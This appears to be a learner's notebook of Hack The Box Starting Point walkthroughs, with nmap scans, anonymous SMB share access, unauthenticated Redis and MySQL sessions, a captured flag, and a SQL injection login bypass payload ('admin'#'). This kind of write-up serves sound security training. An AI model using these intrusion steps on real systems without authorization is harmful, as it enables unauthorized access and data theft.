<a href="https://colab.research.google.com/github/dirkpmueller/Cybersecurity/blob/main/hackthebox.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

##**Hack the box**
- set up VMware
- downloaded and installed Parrot OS Security
- downloaded and run OpenVPN


# TIER 0

##**Tier 0 Lab1 - MEOW**


##**Tier 0 Lab2 - FAWN**

- FTP
- Network
- Protocols
- Reconnaissance
- Anonymous/Guest Access


##**T0L3 - Dancing**

- TAGS - 
`Network`
`Protocols`
`SMB`
`Reconnaissance`
`Anonymous/Guest Access`

- We start, as always, by scanning the target once we are connected to the VPN. Running the following
command will make nmap scan all of the ports and display service versions for each of them.

    `sudo nmap -sV {ip}`

- port 445 TCP for SMB is up and running, which means that we
have an active share that we could potentially explore. Think of this share as a folder that can be accessed
over the internet
- In order to successfully enumerate share content on the remote system, we can use a script called
smbclient . If the script is not present on your Virtual Machine, you can install it by typing the following
command in your terminal (for Debian based operating systems):
    
    `sudo apt-get install smbclient`

- Smbclient will attempt to connect to the remote host and check if there is any authentication required. If
there is, it will ask you for a password for your local username. We should take note of this. If we do not
specify a specific username to smbclient when attempting to connect to the remote host, it will just use your
local machine's username. 

- In this case, we do not have such credentials, so what we will be trying to perform is any of
the following:
  - Guest authentication
  - Anonymous authentication

  Any of these will result in us logging in without knowing a proper username/password combination and
seeing the files stored on the share.

    `smbclient -L {ip}`

    `[-L|--list=HOST] : Selecting the targeted host for the connection request.`

  - `ADMIN$` - Administrative shares are hidden network shares created by the Windows NT family of
operating systems that allow system administrators to have remote access to every disk volume on a
network-connected system. These shares may not be permanently deleted but may be disabled.

  - `C$` - Administrative share for the C:\ disk volume. This is where the operating system is hosted.

  - `IPC$` - The inter-process communication share. Used for inter-process communication via named pipes and is not part of the file system.

  - `WorkShares` - Custom share.

- attempting to log in without the
proper credentials to find improperly configured permissions on any of these shares. We'll just give a blank
password for each username to see if it works.

    ```SMB1 disabled -- no workgroup available
┌─[eu-starting-point-2-dhcp]─[10.10.14.187]─[htb-dirkpm@htb-rpvrgi3e7y]─[~]
└──╼ [★]$ smbclient \\\\10.129.209.78\\ADMIN$
Password for [WORKGROUP\htb-dirkpm]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌─[eu-starting-point-2-dhcp]─[10.10.14.187]─[htb-dirkpm@htb-rpvrgi3e7y]─[~]
└──╼ [★]$ smbclient \\\\10.129.209.78\\C$
Password for [WORKGROUP\htb-dirkpm]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌─[eu-starting-point-2-dhcp]─[10.10.14.187]─[htb-dirkpm@htb-rpvrgi3e7y]─[~]
└──╼ [★]$ smbclient \\\\10.129.209.78\\IPC$
Password for [WORKGROUP\htb-dirkpm]:
Try "help" to get a list of possible commands.
smb: \> EXIT
┌─[eu-starting-point-2-dhcp]─[10.10.14.187]─[htb-dirkpm@htb-rpvrgi3e7y]─[~]
└──╼ [★]$ smbclient \\\\10.129.209.78\\Workshares
Password for [WORKGROUP\htb-dirkpm]:
Try "help" to get a list of possible commands.
smb: \> 
```

- The WorkShares SMB share was poorly configured, allowing us to log in without the appropriate
credentials. We can see our terminal prompt changed to `smb: \>` , letting us know that our shell is now
interacting with the service.

   ```ls : listing contents of the directories within the share
cd : changing current directories within the share
get : downloading the contents of the directories within the share
exit : exiting the smb shell
```

    ```
  smb: \> ls
  .                                   D        0  Mon Mar 29 09:22:01 2021
  ..                                  D        0  Mon Mar 29 09:22:01 2021
  Amy.J                               D        0  Mon Mar 29 10:08:24 2021
  James.P                             D        0  Thu Jun  3 09:38:03 2021

		5114111 blocks of size 4096. 1751626 blocks available
    ```

    ```
smb: \> cd Amy.J
smb: \Amy.J\> ls
  .                                   D        0  Mon Mar 29 10:08:24 2021
  ..                                  D        0  Mon Mar 29 10:08:24 2021
  worknotes.txt                       A       94  Fri Mar 26 11:00:37 2021

		5114111 blocks of size 4096. 1751610 blocks available
smb: \Amy.J\> get worknotes.txt
getting file \Amy.J\worknotes.txt of size 94 as worknotes.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
    ```

    ```
    smb: \Amy.J\> cd ..
smb: \> ls
  .                                   D        0  Mon Mar 29 09:22:01 2021
  ..                                  D        0  Mon Mar 29 09:22:01 2021
  Amy.J                               D        0  Mon Mar 29 10:08:24 2021
  James.P                             D        0  Thu Jun  3 09:38:03 2021

		5114111 blocks of size 4096. 1751594 blocks available
smb: \> cd James.P
smb: \James.P\> ls
  .                                   D        0  Thu Jun  3 09:38:03 2021
  ..                                  D        0  Thu Jun  3 09:38:03 2021
  flag.txt                            A       32  Mon Mar 29 10:26:57 2021

		5114111 blocks of size 4096. 1751594 blocks available
smb: \James.P\> get flag.txt
getting file \James.P\flag.txt of size 32 as flag.txt (0.1 KiloBytes/sec) (average 0.2 KiloBytes/sec)
    ```

    ```
    smb: \James.P\> exit
┌─[eu-starting-point-2-dhcp]─[10.10.14.187]─[htb-dirkpm@htb-rpvrgi3e7y]─[~]
└──╼ [★]$ ls
Desktop  flag.txt  my_data  Templates  worknotes.txt

    ```

##**T0L4 - Redeemer**

- TAGS - 
`Redis`
`Vulnerability Assessment`
`Databases`
`Reconnaissance`
`Anonymous/Guest Access`

`nmap -sC -sV {ip}`

- `-sC`: Performs a script scan using the default set of scripts. It is equivalent to --script=default. Some of the scripts in this category are considered intrusive and should not be run against a target network without permission.
- `-sV`: Enables version detection, which will detect what versions are running on what port.

`sudo apt install redis-tools`

`redis-cli -h {target_IP}`
- `-h <hostname>` : specify the hostname of the target to connect to

`IP:PORT> info`

`IP:PORT> select 0`

`IP:PORT> keys *`

`IP:PORT> get flag`







# TIER 1

##**T1L1 - Appointment**
    
`$sql="SELECT * FROM users WHERE username='$username' AND password='$password'";`
- Notice how after the # symbol, everything turns into a comment? This is how the PHP language works.

- This code above is vulnerable to SQL Injection attacks, where you can modify the query (the $sql variable)
through the log-in form on the web page to make the query do something that is not supposed to do -
bypass the log-in altogether!

- `Username: admin'#` and `Password: abc123`

##**T1L2 - Sequel**

Tags: 
`Vulnerability Assessment`
`Databases`
`MySQL`
`SQL`
`Reconnaissance`
`Weak Credentials`

`sudo apt update && sudo apt install mysql*`

`mysql -h 10.129.120.216 -u root`
- `-h` : Connect to host.
- `-u` : User for log-in if not current user.


MySQL Commands. Check this [Cheatsheet](https://www.mysqltutorial.org/mysql-cheat-sheet.aspx) for more.
```
SHOW databases; : Prints out the databases we can access.
USE {database_name}; : Set to use the database named {database_name}.
SHOW tables; : Prints out the available tables inside the current
database.
SELECT * FROM {table_name}; : Prints out all the data from the table {table_name}.
```

MySQL service shell from where we can explore the tables and data.

```
MariaDB [(none)]> SHOW databases;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.376 sec)

MariaDB [(none)]>
```

From the output, the `htb` database seems to be of value to us. In order to see what rests inside it, we will need to "select" the htb database as the active one - the database we want to actively interact with for our subsequent commands. To achieve this, the `USE htb;` command can be used.

```
MariaDB [(none)]> USE htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [htb]>
```

We have successfully changed the database. The next step is to check what tables does the htb database contain. We can achieve this by following up with the `SHOW tables;` command.

```
MariaDB [htb]> SHOW tables;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.292 sec)

MariaDB [htb]> 
```

We have two tables: config and users . These can be checked sequentially for their content by using the `SELECT * FROM {table_name}` command, where `{table_name}` is the exact name of the table you want to explore, taken from the output above. Once we query the `config` table for contents, the `flag` entry is output in our terminal, alongside its' value.

```
MariaDB [htb]> SELECT * FROM config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.325 sec)

MariaDB [htb]>
```


##**T1L3 - Crocodile**

TAGS: 
`Web`
`Network`
`Custom Applications`
`Protocols`
`Apache`
`FTP`
`Reconnaissance`
`Web Site Structure Discovery`
`Clear Text Credentials`
`Anonymous/Guest Access`

